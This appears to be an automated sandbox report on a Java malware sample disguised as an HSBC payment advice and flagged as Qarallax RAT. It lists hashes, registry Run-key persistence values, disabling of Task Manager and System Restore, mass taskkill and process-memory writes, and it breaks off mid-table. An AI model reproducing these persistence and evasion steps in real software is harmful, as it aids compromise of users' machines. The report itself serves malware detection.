Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
25-08-2020 10:27
Static task
static1
Behavioral task
behavioral1
Sample
Payment Advice Hsbc_pdf.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Payment Advice Hsbc_pdf.jar
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
Payment Advice Hsbc_pdf.jar
-
Size
411KB
-
MD5
f202f81ea024be0ef950ff369bdf4087
-
SHA1
4dbbfe69123c4d8348e61f06f1b6c78e6e685fca
-
SHA256
0b81ff2995706809c70836bc77057db0e6b395c39f8e4623d354efcaa82f7480
-
SHA512
99eff56986a915ca8ed5d301484e24b82d35745e17bfecf275e38705cb4e95f4a60b06930f2d01157905f843971f01b03613b0c79e92dc78ab269fe499271c54
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral2/files/0x000100000001ae30-54.dat qarallax_dll -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Sets file execution options in registry 2 TTPs
-
Loads dropped DLL 1 IoCs
pid Process 2884 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Software\Microsoft\Windows\CurrentVersion\Run\HfdZkYR = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\ujTBR\\NXtxm.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\ujTBR\Desktop.ini java.exe File created C:\Users\Admin\ujTBR\Desktop.ini java.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\ujTBR\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\System32\hJiWv java.exe File opened for modification C:\Windows\System32\hJiWv java.exe -
Kills process with taskkill 19 IoCs
pid Process 4460 taskkill.exe 2656 taskkill.exe 1992 taskkill.exe 4888 taskkill.exe 4288 taskkill.exe 4684 taskkill.exe 4416 taskkill.exe 3864 taskkill.exe 5028 taskkill.exe 3128 taskkill.exe 4672 taskkill.exe 4544 taskkill.exe 1012 taskkill.exe 4216 taskkill.exe 616 taskkill.exe 3612 taskkill.exe 1060 taskkill.exe 4752 taskkill.exe 4744 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3488 powershell.exe 3488 powershell.exe 3488 powershell.exe 3488 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2884 java.exe -
Suspicious use of AdjustPrivilegeToken 125 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4004 WMIC.exe Token: SeSecurityPrivilege 4004 WMIC.exe Token: SeTakeOwnershipPrivilege 4004 WMIC.exe Token: SeLoadDriverPrivilege 4004 WMIC.exe Token: SeSystemProfilePrivilege 4004 WMIC.exe Token: SeSystemtimePrivilege 4004 WMIC.exe Token: SeProfSingleProcessPrivilege 4004 WMIC.exe Token: SeIncBasePriorityPrivilege 4004 WMIC.exe Token: SeCreatePagefilePrivilege 4004 WMIC.exe Token: SeBackupPrivilege 4004 WMIC.exe Token: SeRestorePrivilege 4004 WMIC.exe Token: SeShutdownPrivilege 4004 WMIC.exe Token: SeDebugPrivilege 4004 WMIC.exe Token: SeSystemEnvironmentPrivilege 4004 WMIC.exe Token: SeRemoteShutdownPrivilege 4004 WMIC.exe Token: SeUndockPrivilege 4004 WMIC.exe Token: SeManageVolumePrivilege 4004 WMIC.exe Token: 33 4004 WMIC.exe Token: 34 4004 WMIC.exe Token: 35 4004 WMIC.exe Token: 36 4004 WMIC.exe Token: SeIncreaseQuotaPrivilege 4004 WMIC.exe Token: SeSecurityPrivilege 4004 WMIC.exe Token: SeTakeOwnershipPrivilege 4004 WMIC.exe Token: SeLoadDriverPrivilege 4004 WMIC.exe Token: SeSystemProfilePrivilege 4004 WMIC.exe Token: SeSystemtimePrivilege 4004 WMIC.exe Token: SeProfSingleProcessPrivilege 4004 WMIC.exe Token: SeIncBasePriorityPrivilege 4004 WMIC.exe Token: SeCreatePagefilePrivilege 4004 WMIC.exe Token: SeBackupPrivilege 4004 WMIC.exe Token: SeRestorePrivilege 4004 WMIC.exe Token: SeShutdownPrivilege 4004 WMIC.exe Token: SeDebugPrivilege 4004 WMIC.exe Token: SeSystemEnvironmentPrivilege 4004 WMIC.exe Token: SeRemoteShutdownPrivilege 4004 WMIC.exe Token: SeUndockPrivilege 4004 WMIC.exe Token: SeManageVolumePrivilege 4004 WMIC.exe Token: 33 4004 WMIC.exe Token: 34 4004 WMIC.exe Token: 35 4004 WMIC.exe Token: 36 4004 WMIC.exe Token: SeIncreaseQuotaPrivilege 4000 WMIC.exe Token: SeSecurityPrivilege 4000 WMIC.exe Token: SeTakeOwnershipPrivilege 4000 WMIC.exe Token: SeLoadDriverPrivilege 4000 WMIC.exe Token: SeSystemProfilePrivilege 4000 WMIC.exe Token: SeSystemtimePrivilege 4000 WMIC.exe Token: SeProfSingleProcessPrivilege 4000 WMIC.exe Token: SeIncBasePriorityPrivilege 4000 WMIC.exe Token: SeCreatePagefilePrivilege 4000 WMIC.exe Token: SeBackupPrivilege 4000 WMIC.exe Token: SeRestorePrivilege 4000 WMIC.exe Token: SeShutdownPrivilege 4000 WMIC.exe Token: SeDebugPrivilege 4000 WMIC.exe Token: SeSystemEnvironmentPrivilege 4000 WMIC.exe Token: SeRemoteShutdownPrivilege 4000 WMIC.exe Token: SeUndockPrivilege 4000 WMIC.exe Token: SeManageVolumePrivilege 4000 WMIC.exe Token: 33 4000 WMIC.exe Token: 34 4000 WMIC.exe Token: 35 4000 WMIC.exe Token: 36 4000 WMIC.exe Token: SeIncreaseQuotaPrivilege 4000 WMIC.exe Token: SeSecurityPrivilege 4000 WMIC.exe Token: SeTakeOwnershipPrivilege 4000 WMIC.exe Token: SeLoadDriverPrivilege 4000 WMIC.exe Token: SeSystemProfilePrivilege 4000 WMIC.exe Token: SeSystemtimePrivilege 4000 WMIC.exe Token: SeProfSingleProcessPrivilege 4000 WMIC.exe Token: SeIncBasePriorityPrivilege 4000 WMIC.exe Token: SeCreatePagefilePrivilege 4000 WMIC.exe Token: SeBackupPrivilege 4000 WMIC.exe Token: SeRestorePrivilege 4000 WMIC.exe Token: SeShutdownPrivilege 4000 WMIC.exe Token: SeDebugPrivilege 4000 WMIC.exe Token: SeSystemEnvironmentPrivilege 4000 WMIC.exe Token: SeRemoteShutdownPrivilege 4000 WMIC.exe Token: SeUndockPrivilege 4000 WMIC.exe Token: SeManageVolumePrivilege 4000 WMIC.exe Token: 33 4000 WMIC.exe Token: 34 4000 WMIC.exe Token: 35 4000 WMIC.exe Token: 36 4000 WMIC.exe Token: SeDebugPrivilege 3612 taskkill.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeDebugPrivilege 3864 taskkill.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 3128 taskkill.exe Token: SeIncreaseQuotaPrivilege 3488 powershell.exe Token: SeSecurityPrivilege 3488 powershell.exe Token: SeTakeOwnershipPrivilege 3488 powershell.exe Token: SeLoadDriverPrivilege 3488 powershell.exe Token: SeSystemProfilePrivilege 3488 powershell.exe Token: SeSystemtimePrivilege 3488 powershell.exe Token: SeProfSingleProcessPrivilege 3488 powershell.exe Token: SeIncBasePriorityPrivilege 3488 powershell.exe Token: SeCreatePagefilePrivilege 3488 powershell.exe Token: SeBackupPrivilege 3488 powershell.exe Token: SeRestorePrivilege 3488 powershell.exe Token: SeShutdownPrivilege 3488 powershell.exe Token: SeDebugPrivilege 3488 powershell.exe Token: SeSystemEnvironmentPrivilege 3488 powershell.exe Token: SeRemoteShutdownPrivilege 3488 powershell.exe Token: SeUndockPrivilege 3488 powershell.exe Token: SeManageVolumePrivilege 3488 powershell.exe Token: 33 3488 powershell.exe Token: 34 3488 powershell.exe Token: 35 3488 powershell.exe Token: 36 3488 powershell.exe Token: SeDebugPrivilege 2656 taskkill.exe Token: SeDebugPrivilege 4672 taskkill.exe Token: SeDebugPrivilege 4544 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeDebugPrivilege 1012 taskkill.exe Token: SeDebugPrivilege 4888 taskkill.exe Token: SeDebugPrivilege 4216 taskkill.exe Token: SeDebugPrivilege 4288 taskkill.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: SeDebugPrivilege 4684 taskkill.exe Token: SeDebugPrivilege 5028 taskkill.exe Token: SeDebugPrivilege 4752 taskkill.exe Token: SeDebugPrivilege 4744 taskkill.exe Token: SeDebugPrivilege 4416 taskkill.exe Token: SeDebugPrivilege 616 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2884 java.exe -
Suspicious use of WriteProcessMemory 412 IoCs
description pid Process procid_target PID 2884 wrote to memory of 3932 2884 java.exe 69 PID 2884 wrote to memory of 3932 2884 java.exe 69 PID 2884 wrote to memory of 3596 2884 java.exe 71 PID 2884 wrote to memory of 3596 2884 java.exe 71 PID 3596 wrote to memory of 4004 3596 cmd.exe 73 PID 3596 wrote to memory of 4004 3596 cmd.exe 73 PID 2884 wrote to memory of 1936 2884 java.exe 74 PID 2884 wrote to memory of 1936 2884 java.exe 74 PID 1936 wrote to memory of 4000 1936 cmd.exe 76 PID 1936 wrote to memory of 4000 1936 cmd.exe 76 PID 2884 wrote to memory of 3044 2884 java.exe 78 PID 2884 wrote to memory of 3044 2884 java.exe 78 PID 2884 wrote to memory of 3900 2884 java.exe 80 PID 2884 wrote to memory of 3900 2884 java.exe 80 PID 2884 wrote to memory of 852 2884 java.exe 84 PID 2884 wrote to memory of 852 2884 java.exe 84 PID 2884 wrote to memory of 900 2884 java.exe 85 PID 2884 wrote to memory of 900 2884 java.exe 85 PID 2884 wrote to memory of 492 2884 java.exe 87 PID 2884 wrote to memory of 492 2884 java.exe 87 PID 2884 wrote to memory of 1072 2884 java.exe 89 PID 2884 wrote to memory of 1072 2884 java.exe 89 PID 2884 wrote to memory of 2628 2884 java.exe 91 PID 2884 wrote to memory of 2628 2884 java.exe 91 PID 2884 wrote to memory of 3796 2884 java.exe 94 PID 2884 wrote to memory of 3796 2884 java.exe 94 PID 2884 wrote to memory of 3040 2884 java.exe 96 PID 2884 wrote to memory of 3040 2884 java.exe 96 PID 2884 wrote to memory of 3488 2884 java.exe 98 PID 2884 wrote to memory of 3488 2884 java.exe 98 PID 2884 wrote to memory of 1584 2884 java.exe 99 PID 2884 wrote to memory of 1584 2884 java.exe 99 PID 2884 wrote to memory of 3612 2884 java.exe 100 PID 2884 wrote to memory of 3612 2884 java.exe 100 PID 2884 wrote to memory of 2572 2884 java.exe 101 PID 2884 wrote to memory of 2572 2884 java.exe 101 PID 2884 wrote to memory of 2028 2884 java.exe 105 PID 2884 wrote to memory of 2028 2884 java.exe 105 PID 2884 wrote to memory of 2416 2884 java.exe 107 PID 2884 wrote to memory of 2416 2884 java.exe 107 PID 2884 wrote to memory of 3916 2884 java.exe 111 PID 2884 wrote to memory of 3916 2884 java.exe 111 PID 2884 wrote to memory of 1324 2884 java.exe 112 PID 2884 wrote to memory of 1324 2884 java.exe 112 PID 2884 wrote to memory of 3572 2884 java.exe 115 PID 2884 wrote to memory of 3572 2884 java.exe 115 PID 2884 wrote to memory of 3588 2884 java.exe 116 PID 2884 wrote to memory of 3588 2884 java.exe 116 PID 2884 wrote to memory of 3708 2884 java.exe 119 PID 2884 wrote to memory of 3708 2884 java.exe 119 PID 2884 wrote to memory of 1540 2884 java.exe 120 PID 2884 wrote to memory of 1540 2884 java.exe 120 PID 2884 wrote to memory of 2840 2884 java.exe 123 PID 2884 wrote to memory of 2840 2884 java.exe 123 PID 2884 wrote to memory of 1908 2884 java.exe 124 PID 2884 wrote to memory of 1908 2884 java.exe 124 PID 2884 wrote to memory of 1060 2884 java.exe 127 PID 2884 wrote to memory of 1060 2884 java.exe 127 PID 2884 wrote to memory of 808 2884 java.exe 128 PID 2884 wrote to memory of 808 2884 java.exe 128 PID 2884 wrote to memory of 3864 2884 java.exe 129 PID 2884 wrote to memory of 3864 2884 java.exe 129 PID 3040 wrote to memory of 3996 3040 cmd.exe 130 PID 3040 wrote to memory of 3996 3040 cmd.exe 130 PID 2884 wrote to memory of 972 2884 java.exe 133 PID 2884 wrote to memory of 972 2884 java.exe 133 PID 2884 wrote to memory of 3380 2884 java.exe 135 PID 2884 wrote to memory of 3380 2884 java.exe 135 PID 2884 wrote to memory of 3252 2884 java.exe 139 PID 2884 wrote to memory of 3252 2884 java.exe 139 PID 2884 wrote to memory of 2292 2884 java.exe 140 PID 2884 wrote to memory of 2292 2884 java.exe 140 PID 2884 wrote to memory of 4144 2884 java.exe 143 PID 2884 wrote to memory of 4144 2884 java.exe 143 PID 2884 wrote to memory of 4168 2884 java.exe 144 PID 2884 wrote to memory of 4168 2884 java.exe 144 PID 2884 wrote to memory of 4292 2884 java.exe 147 PID 2884 wrote to memory of 4292 2884 java.exe 147 PID 2884 wrote to memory of 4304 2884 java.exe 148 PID 2884 wrote to memory of 4304 2884 java.exe 148 PID 3040 wrote to memory of 4384 3040 cmd.exe 151 PID 3040 wrote to memory of 4384 3040 cmd.exe 151 PID 2884 wrote to memory of 4412 2884 java.exe 152 PID 2884 wrote to memory of 4412 2884 java.exe 152 PID 2884 wrote to memory of 4432 2884 java.exe 153 PID 2884 wrote to memory of 4432 2884 java.exe 153 PID 2884 wrote to memory of 4460 2884 java.exe 154 PID 2884 wrote to memory of 4460 2884 java.exe 154 PID 2884 wrote to memory of 4592 2884 java.exe 158 PID 2884 wrote to memory of 4592 2884 java.exe 158 PID 2884 wrote to memory of 4612 2884 java.exe 159 PID 2884 wrote to memory of 4612 2884 java.exe 159 PID 2884 wrote to memory of 4660 2884 java.exe 162 PID 2884 wrote to memory of 4660 2884 java.exe 162 PID 2884 wrote to memory of 4700 2884 java.exe 163 PID 2884 wrote to memory of 4700 2884 java.exe 163 PID 2884 wrote to memory of 4724 2884 java.exe 165 PID 2884 wrote to memory of 4724 2884 java.exe 165 PID 2884 wrote to memory of 4804 2884 java.exe 168 PID 2884 wrote to memory of 4804 2884 java.exe 168 PID 2884 wrote to memory of 4876 2884 java.exe 170 PID 2884 wrote to memory of 4876 2884 java.exe 170 PID 2884 wrote to memory of 4924 2884 java.exe 172 PID 2884 wrote to memory of 4924 2884 java.exe 172 PID 2884 wrote to memory of 4972 2884 java.exe 174 PID 2884 wrote to memory of 4972 2884 java.exe 174 PID 4700 wrote to memory of 5076 4700 cmd.exe 176 PID 4700 wrote to memory of 5076 4700 cmd.exe 176 PID 4700 wrote to memory of 5100 4700 cmd.exe 177 PID 4700 wrote to memory of 5100 4700 cmd.exe 177 PID 2884 wrote to memory of 3128 2884 java.exe 178 PID 2884 wrote to memory of 3128 2884 java.exe 178 PID 2884 wrote to memory of 3736 2884 java.exe 180 PID 2884 wrote to memory of 3736 2884 java.exe 180 PID 3736 wrote to memory of 2416 3736 cmd.exe 182 PID 3736 wrote to memory of 2416 3736 cmd.exe 182 PID 3736 wrote to memory of 1552 3736 cmd.exe 183 PID 3736 wrote to memory of 1552 3736 cmd.exe 183 PID 2884 wrote to memory of 4160 2884 java.exe 184 PID 2884 wrote to memory of 4160 2884 java.exe 184 PID 4160 wrote to memory of 1060 4160 cmd.exe 186 PID 4160 wrote to memory of 1060 4160 cmd.exe 186 PID 4160 wrote to memory of 808 4160 cmd.exe 187 PID 4160 wrote to memory of 808 4160 cmd.exe 187 PID 2884 wrote to memory of 1404 2884 java.exe 188 PID 2884 wrote to memory of 1404 2884 java.exe 188 PID 2884 wrote to memory of 2656 2884 java.exe 189 PID 2884 wrote to memory of 2656 2884 java.exe 189 PID 1404 wrote to memory of 4164 1404 cmd.exe 193 PID 1404 wrote to memory of 4164 1404 cmd.exe 193 PID 1404 wrote to memory of 2292 1404 cmd.exe 194 PID 1404 wrote to memory of 2292 1404 cmd.exe 194 PID 2884 wrote to memory of 4312 2884 java.exe 195 PID 2884 wrote to memory of 4312 2884 java.exe 195 PID 4312 wrote to memory of 4236 4312 cmd.exe 197 PID 4312 wrote to memory of 4236 4312 cmd.exe 197 PID 4312 wrote to memory of 4220 4312 cmd.exe 198 PID 4312 wrote to memory of 4220 4312 cmd.exe 198 PID 2884 wrote to memory of 4284 2884 java.exe 199 PID 2884 wrote to memory of 4284 2884 java.exe 199 PID 4284 wrote to memory of 4004 4284 cmd.exe 201 PID 4284 wrote to memory of 4004 4284 cmd.exe 201 PID 4284 wrote to memory of 4424 4284 cmd.exe 202 PID 4284 wrote to memory of 4424 4284 cmd.exe 202 PID 2884 wrote to memory of 4472 2884 java.exe 203 PID 2884 wrote to memory of 4472 2884 java.exe 203 PID 4472 wrote to memory of 4304 4472 cmd.exe 205 PID 4472 wrote to memory of 4304 4472 cmd.exe 205 PID 4472 wrote to memory of 4352 4472 cmd.exe 206 PID 4472 wrote to memory of 4352 4472 cmd.exe 206 PID 2884 wrote to memory of 4320 2884 java.exe 207 PID 2884 wrote to memory of 4320 2884 java.exe 207 PID 4320 wrote to memory of 3792 4320 cmd.exe 209 PID 4320 wrote to memory of 3792 4320 cmd.exe 209 PID 4320 wrote to memory of 3800 4320 cmd.exe 210 PID 4320 wrote to memory of 3800 4320 cmd.exe 210 PID 2884 wrote to memory of 4384 2884 java.exe 211 PID 2884 wrote to memory of 4384 2884 java.exe 211 PID 4384 wrote to memory of 4604 4384 cmd.exe 213 PID 4384 wrote to memory of 4604 4384 cmd.exe 213 PID 4384 wrote to memory of 4668 4384 cmd.exe 214 PID 4384 wrote to memory of 4668 4384 cmd.exe 214 PID 2884 wrote to memory of 4576 2884 java.exe 215 PID 2884 wrote to memory of 4576 2884 java.exe 215 PID 4576 wrote to memory of 4852 4576 cmd.exe 217 PID 4576 wrote to memory of 4852 4576 cmd.exe 217 PID 4576 wrote to memory of 4896 4576 cmd.exe 218 PID 4576 wrote to memory of 4896 4576 cmd.exe 218 PID 2884 wrote to memory of 4672 2884 java.exe 219 PID 2884 wrote to memory of 4672 2884 java.exe 219 PID 2884 wrote to memory of 4840 2884 java.exe 221 PID 2884 wrote to memory of 4840 2884 java.exe 221 PID 4840 wrote to memory of 4916 4840 cmd.exe 223 PID 4840 wrote to memory of 4916 4840 cmd.exe 223 PID 4840 wrote to memory of 4612 4840 cmd.exe 224 PID 4840 wrote to memory of 4612 4840 cmd.exe 224 PID 2884 wrote to memory of 4592 2884 java.exe 225 PID 2884 wrote to memory of 4592 2884 java.exe 225 PID 4592 wrote to memory of 5012 4592 cmd.exe 227 PID 4592 wrote to memory of 5012 4592 cmd.exe 227 PID 4592 wrote to memory of 4964 4592 cmd.exe 228 PID 4592 wrote to memory of 4964 4592 cmd.exe 228 PID 2884 wrote to memory of 5028 2884 java.exe 229 PID 2884 wrote to memory of 5028 2884 java.exe 229 PID 5028 wrote to memory of 4828 5028 cmd.exe 231 PID 5028 wrote to memory of 4828 5028 cmd.exe 231 PID 5028 wrote to memory of 3552 5028 cmd.exe 232 PID 5028 wrote to memory of 3552 5028 cmd.exe 232 PID 2884 wrote to memory of 4804 2884 java.exe 233 PID 2884 wrote to memory of 4804 2884 java.exe 233 PID 4804 wrote to memory of 4900 4804 cmd.exe 235 PID 4804 wrote to memory of 4900 4804 cmd.exe 235 PID 4804 wrote to memory of 4984 4804 cmd.exe 236 PID 4804 wrote to memory of 4984 4804 cmd.exe 236 PID 2884 wrote to memory of 4868 2884 java.exe 237 PID 2884 wrote to memory of 4868 2884 java.exe 237 PID 4868 wrote to memory of 5068 4868 cmd.exe 239 PID 4868 wrote to memory of 5068 4868 cmd.exe 239 PID 4868 wrote to memory of 5020 4868 cmd.exe 240 PID 4868 wrote to memory of 5020 4868 cmd.exe 240 PID 2884 wrote to memory of 4820 2884 java.exe 241 PID 2884 wrote to memory of 4820 2884 java.exe 241 PID 4820 wrote to memory of 4460 4820 cmd.exe 243 PID 4820 wrote to memory of 4460 4820 cmd.exe 243 PID 2884 wrote to memory of 4544 2884 java.exe 244 PID 2884 wrote to memory of 4544 2884 java.exe 244 PID 4820 wrote to memory of 2752 4820 cmd.exe 246 PID 4820 wrote to memory of 2752 4820 cmd.exe 246 PID 2884 wrote to memory of 3880 2884 java.exe 247 PID 2884 wrote to memory of 3880 2884 java.exe 247 PID 3880 wrote to memory of 936 3880 cmd.exe 249 PID 3880 wrote to memory of 936 3880 cmd.exe 249 PID 3880 wrote to memory of 1552 3880 cmd.exe 250 PID 3880 wrote to memory of 1552 3880 cmd.exe 250 PID 2884 wrote to memory of 3884 2884 java.exe 251 PID 2884 wrote to memory of 3884 2884 java.exe 251 PID 3884 wrote to memory of 804 3884 cmd.exe 253 PID 3884 wrote to memory of 804 3884 cmd.exe 253 PID 3884 wrote to memory of 3040 3884 cmd.exe 254 PID 3884 wrote to memory of 3040 3884 cmd.exe 254 PID 2884 wrote to memory of 1180 2884 java.exe 255 PID 2884 wrote to memory of 1180 2884 java.exe 255 PID 1180 wrote to memory of 1444 1180 cmd.exe 257 PID 1180 wrote to memory of 1444 1180 cmd.exe 257 PID 1180 wrote to memory of 972 1180 cmd.exe 258 PID 1180 wrote to memory of 972 1180 cmd.exe 258 PID 2884 wrote to memory of 4264 2884 java.exe 259 PID 2884 wrote to memory of 4264 2884 java.exe 259 PID 4264 wrote to memory of 4200 4264 cmd.exe 261 PID 4264 wrote to memory of 4200 4264 cmd.exe 261 PID 4264 wrote to memory of 3708 4264 cmd.exe 262 PID 4264 wrote to memory of 3708 4264 cmd.exe 262 PID 2884 wrote to memory of 4252 2884 java.exe 263 PID 2884 wrote to memory of 4252 2884 java.exe 263 PID 4252 wrote to memory of 4204 4252 cmd.exe 265 PID 4252 wrote to memory of 4204 4252 cmd.exe 265 PID 4252 wrote to memory of 3996 4252 cmd.exe 266 PID 4252 wrote to memory of 3996 4252 cmd.exe 266 PID 2884 wrote to memory of 996 2884 java.exe 267 PID 2884 wrote to memory of 996 2884 java.exe 267 PID 996 wrote to memory of 4400 996 cmd.exe 269 PID 996 wrote to memory of 4400 996 cmd.exe 269 PID 996 wrote to memory of 720 996 cmd.exe 270 PID 996 wrote to memory of 720 996 cmd.exe 270 PID 2884 wrote to memory of 3932 2884 java.exe 271 PID 2884 wrote to memory of 3932 2884 java.exe 271 PID 2884 wrote to memory of 1992 2884 java.exe 273 PID 2884 wrote to memory of 1992 2884 java.exe 273 PID 3932 wrote to memory of 4528 3932 cmd.exe 275 PID 3932 wrote to memory of 4528 3932 cmd.exe 275 PID 3932 wrote to memory of 2168 3932 cmd.exe 276 PID 3932 wrote to memory of 2168 3932 cmd.exe 276 PID 2884 wrote to memory of 3788 2884 java.exe 277 PID 2884 wrote to memory of 3788 2884 java.exe 277 PID 3788 wrote to memory of 4476 3788 cmd.exe 279 PID 3788 wrote to memory of 4476 3788 cmd.exe 279 PID 3788 wrote to memory of 4604 3788 cmd.exe 280 PID 3788 wrote to memory of 4604 3788 cmd.exe 280 PID 2884 wrote to memory of 4484 2884 java.exe 281 PID 2884 wrote to memory of 4484 2884 java.exe 281 PID 4484 wrote to memory of 4832 4484 cmd.exe 283 PID 4484 wrote to memory of 4832 4484 cmd.exe 283 PID 4484 wrote to memory of 4116 4484 cmd.exe 284 PID 4484 wrote to memory of 4116 4484 cmd.exe 284 PID 2884 wrote to memory of 4916 2884 java.exe 285 PID 2884 wrote to memory of 4916 2884 java.exe 285 PID 4916 wrote to memory of 4532 4916 cmd.exe 287 PID 4916 wrote to memory of 4532 4916 cmd.exe 287 PID 4916 wrote to memory of 4844 4916 cmd.exe 288 PID 4916 wrote to memory of 4844 4916 cmd.exe 288 PID 2884 wrote to memory of 4748 2884 java.exe 289 PID 2884 wrote to memory of 4748 2884 java.exe 289 PID 4748 wrote to memory of 4964 4748 cmd.exe 291 PID 4748 wrote to memory of 4964 4748 cmd.exe 291 PID 4748 wrote to memory of 3908 4748 cmd.exe 292 PID 4748 wrote to memory of 3908 4748 cmd.exe 292 PID 2884 wrote to memory of 4948 2884 java.exe 293 PID 2884 wrote to memory of 4948 2884 java.exe 293 PID 4948 wrote to memory of 5004 4948 cmd.exe 295 PID 4948 wrote to memory of 5004 4948 cmd.exe 295 PID 4948 wrote to memory of 4984 4948 cmd.exe 296 PID 4948 wrote to memory of 4984 4948 cmd.exe 296 PID 2884 wrote to memory of 5064 2884 java.exe 297 PID 2884 wrote to memory of 5064 2884 java.exe 297 PID 5064 wrote to memory of 4464 5064 cmd.exe 299 PID 5064 wrote to memory of 4464 5064 cmd.exe 299 PID 5064 wrote to memory of 5104 5064 cmd.exe 300 PID 5064 wrote to memory of 5104 5064 cmd.exe 300 PID 2884 wrote to memory of 5100 2884 java.exe 301 PID 2884 wrote to memory of 5100 2884 java.exe 301 PID 5100 wrote to memory of 2660 5100 cmd.exe 303 PID 5100 wrote to memory of 2660 5100 cmd.exe 303 PID 5100 wrote to memory of 852 5100 cmd.exe 304 PID 5100 wrote to memory of 852 5100 cmd.exe 304 PID 2884 wrote to memory of 2840 2884 java.exe 305 PID 2884 wrote to memory of 2840 2884 java.exe 305 PID 2840 wrote to memory of 3776 2840 cmd.exe 307 PID 2840 wrote to memory of 3776 2840 cmd.exe 307 PID 2884 wrote to memory of 1012 2884 java.exe 308 PID 2884 wrote to memory of 1012 2884 java.exe 308 PID 2840 wrote to memory of 3040 2840 cmd.exe 310 PID 2840 wrote to memory of 3040 2840 cmd.exe 310 PID 2884 wrote to memory of 3900 2884 java.exe 311 PID 2884 wrote to memory of 3900 2884 java.exe 311 PID 3900 wrote to memory of 4356 3900 cmd.exe 313 PID 3900 wrote to memory of 4356 3900 cmd.exe 313 PID 3900 wrote to memory of 1460 3900 cmd.exe 314 PID 3900 wrote to memory of 1460 3900 cmd.exe 314 PID 2884 wrote to memory of 4168 2884 java.exe 315 PID 2884 wrote to memory of 4168 2884 java.exe 315 PID 4168 wrote to memory of 1028 4168 cmd.exe 317 PID 4168 wrote to memory of 1028 4168 cmd.exe 317 PID 4168 wrote to memory of 4720 4168 cmd.exe 318 PID 4168 wrote to memory of 4720 4168 cmd.exe 318 PID 2884 wrote to memory of 5016 2884 java.exe 319 PID 2884 wrote to memory of 5016 2884 java.exe 319 PID 5016 wrote to memory of 4392 5016 cmd.exe 321 PID 5016 wrote to memory of 4392 5016 cmd.exe 321 PID 5016 wrote to memory of 3280 5016 cmd.exe 322 PID 5016 wrote to memory of 3280 5016 cmd.exe 322 PID 2884 wrote to memory of 4332 2884 java.exe 323 PID 2884 wrote to memory of 4332 2884 java.exe 323 PID 4332 wrote to memory of 3616 4332 cmd.exe 325 PID 4332 wrote to memory of 3616 4332 cmd.exe 325 PID 4332 wrote to memory of 4580 4332 cmd.exe 326 PID 4332 wrote to memory of 4580 4332 cmd.exe 326 PID 2884 wrote to memory of 4328 2884 java.exe 327 PID 2884 wrote to memory of 4328 2884 java.exe 327 PID 4328 wrote to memory of 4472 4328 cmd.exe 329 PID 4328 wrote to memory of 4472 4328 cmd.exe 329 PID 4328 wrote to memory of 4576 4328 cmd.exe 330 PID 4328 wrote to memory of 4576 4328 cmd.exe 330 PID 2884 wrote to memory of 3880 2884 java.exe 331 PID 2884 wrote to memory of 3880 2884 java.exe 331 PID 3880 wrote to memory of 4620 3880 cmd.exe 333 PID 3880 wrote to memory of 4620 3880 cmd.exe 333 PID 3880 wrote to memory of 4752 3880 cmd.exe 334 PID 3880 wrote to memory of 4752 3880 cmd.exe 334 PID 2884 wrote to memory of 5032 2884 java.exe 335 PID 2884 wrote to memory of 5032 2884 java.exe 335 PID 5032 wrote to memory of 4056 5032 cmd.exe 337 PID 5032 wrote to memory of 4056 5032 cmd.exe 337 PID 5032 wrote to memory of 2568 5032 cmd.exe 338 PID 5032 wrote to memory of 2568 5032 cmd.exe 338 PID 2884 wrote to memory of 500 2884 java.exe 339 PID 2884 wrote to memory of 500 2884 java.exe 339 PID 500 wrote to memory of 3292 500 cmd.exe 341 PID 500 wrote to memory of 3292 500 cmd.exe 341 PID 500 wrote to memory of 1344 500 cmd.exe 342 PID 500 wrote to memory of 1344 500 cmd.exe 342 PID 2884 wrote to memory of 4148 2884 java.exe 343 PID 2884 wrote to memory of 4148 2884 java.exe 343 PID 4148 wrote to memory of 4292 4148 cmd.exe 345 PID 4148 wrote to memory of 4292 4148 cmd.exe 345 PID 4148 wrote to memory of 720 4148 cmd.exe 346 PID 4148 wrote to memory of 720 4148 cmd.exe 346 PID 2884 wrote to memory of 4404 2884 java.exe 347 PID 2884 wrote to memory of 4404 2884 java.exe 347 PID 4404 wrote to memory of 3792 4404 cmd.exe 349 PID 4404 wrote to memory of 3792 4404 cmd.exe 349 PID 4404 wrote to memory of 616 4404 cmd.exe 350 PID 4404 wrote to memory of 616 4404 cmd.exe 350 PID 2884 wrote to memory of 4648 2884 java.exe 351 PID 2884 wrote to memory of 4648 2884 java.exe 351 PID 4648 wrote to memory of 4476 4648 cmd.exe 353 PID 4648 wrote to memory of 4476 4648 cmd.exe 353 PID 4648 wrote to memory 